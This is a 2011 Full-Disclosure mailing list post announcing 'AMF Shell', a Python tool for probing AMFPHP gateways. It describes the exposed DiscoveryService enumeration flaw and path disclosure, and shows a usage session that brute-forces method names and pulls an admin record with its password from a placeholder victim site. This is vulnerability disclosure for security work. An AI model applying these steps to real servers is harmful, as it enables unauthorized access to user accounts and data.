[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Action Message Format (AMF) Shell
From:       George Hedfors <George.Hedfors () cybercom ! com>
Date:       2011-04-30 21:30:32
Message-ID: 9808CB1AE5450E4DA5589BBDA6C7E4BE61D1C83056 () MMAMBX00 ! global ! ad
[Download RAW message or body]


>From my blog at http://george.hedfors.com/content/action-message-format-amf=
-shell. Please visit that url for updates

Introduction
Action Message Format (AMF) is a binary format used to serialize ActionScri=
pt objects. It is used primarily to exchange data between an Adobe Flash ap=
plication and a remote service, usually over the internet.

Background
When I was auditing the security of a content management system based on Fl=
ash, I quickly realized that the information that I could dig out by hand f=
rom the binary communication wouldn't take me the whole way. Burp Suite Pro=
, which I was using at the time has a neat feature that decodes the seriali=
zed communication on the fly. However, it doesn't provide an adequate way t=
o manipulate. Therefore, I started investigating into possibilities of maki=
ng a tool that could in fact communicate freely with the AMF gateway using =
its own protocol.

After some investigation, I found PyAMF, which is a Python implementation o=
f the AMF messaging protocol. The tool that I started making then turned in=
to something that I'd like to call, a AMF Shell.

AMFPHP Vulnerabilities
There are a number of vulnerabilities that are standard with AMFPHP, which =
was the gateway software that I've constructed AMFShell around. By default,=
 there is a so called "Service Browser" installed that allows you to to pre=
tty much the same as my AMF Shell. It's typically installed in a path such =
as:

http://www.victim.com/amfphp/browser

However, most administrators are aware of this vulnerability and have remov=
ed the Flash page. What they usually haven't removed is the service files a=
ssociated with it. They are typically located at:

http://www.victim.com/amfphp/services/amfphp/DiscoveryServices.php

DiscoveryService.php is the AMF class that the Service Browser calls on to =
do it's magic. This class can still be contacted using AMFShell for example=
. The vulnerability resides in the fact that the DiscoveryService class has=
 methods that enumerates other local services and classes and returns them.

The other vulnerability in AMFPHP is that it discloses the local path in ca=
se one is trying to use a non-existent class or method. What you'll get is =
something like this, when trying to access a class called 'asdf':

The class {asdf} could not be found under the class path {/mnt/target03/350=
439/508174/www/web/content/amfphp/services/asdf.php}

Yes, I've also been investigating into the possibility of directory travers=
al but have so far been unsuccessful. One of the reasons is that it convert=
s dots '.' into slashes and is not subjected to hex or any other encoding.

Available commands
brute
Launches a brute force attack for method names to the selected class using =
common names.
call methodName(args,..)
Call a method from the current class. Arguments
may be single arguments or arrays:
call methodName(['array','of','stuff'])
call methodName(arg1,arg2,arg3)
list
Lists available classes
use service.className
Change current class

Usage example
$ ./amfshell.py http://www.victim.com/amfphp/gateway.php
[+] AMFPHP exists and appears to be vulnerable to 'DiscoveryService'.
[*] To disable 'DiscoveryServices', remove /homepages/16/d264/htdocs/servic=
es/amfphp/DiscoveryService.php

Welcome to Action Message Formate Shell by George Hedfors. Type 'help' for =
command list.

(amfphp.DiscoveryService) list
amfphp.DiscoveryService
UserService
(amfphp.DiscoveryService) use UserService
(UserService) brute
This may seriously harm your environment, are you sure? (y/N): y
Testing 539 methods...
Missing argument 1 for UserService::addUser()
Missing argument 1 for UserService::getUser()
Missing argument 1 for UserService::updateUser()
(UserService) call getUser(admin)
{"username": "admin", "password": "admin123", "id": "1"}

What could possibly go wrong from here? :)

Known bugs
Some pages return HTML content instead of AMF when calling a method. This c=
annot be parsed by PyAMF but can easily be viewed using a sniffing tool, su=
ch as Wireshark.

George Hedfors
IT- & Information Security Consultant

Cybercom Sweden East AB
Lindhagensgatan 126   Box 30154   SE-104 25 Stockholm

Phone +46 8 726 75 00   Fax +46 8 19 33 22

http://www.cybercomgroup.com

http://george.hedfors.com/
http://www.linkedin.com/in/georgehedfors=

["amfshell-0.23.tgz" (application/x-compressed)]

[prev in list] [next in list] [prev in thread] [next in thread]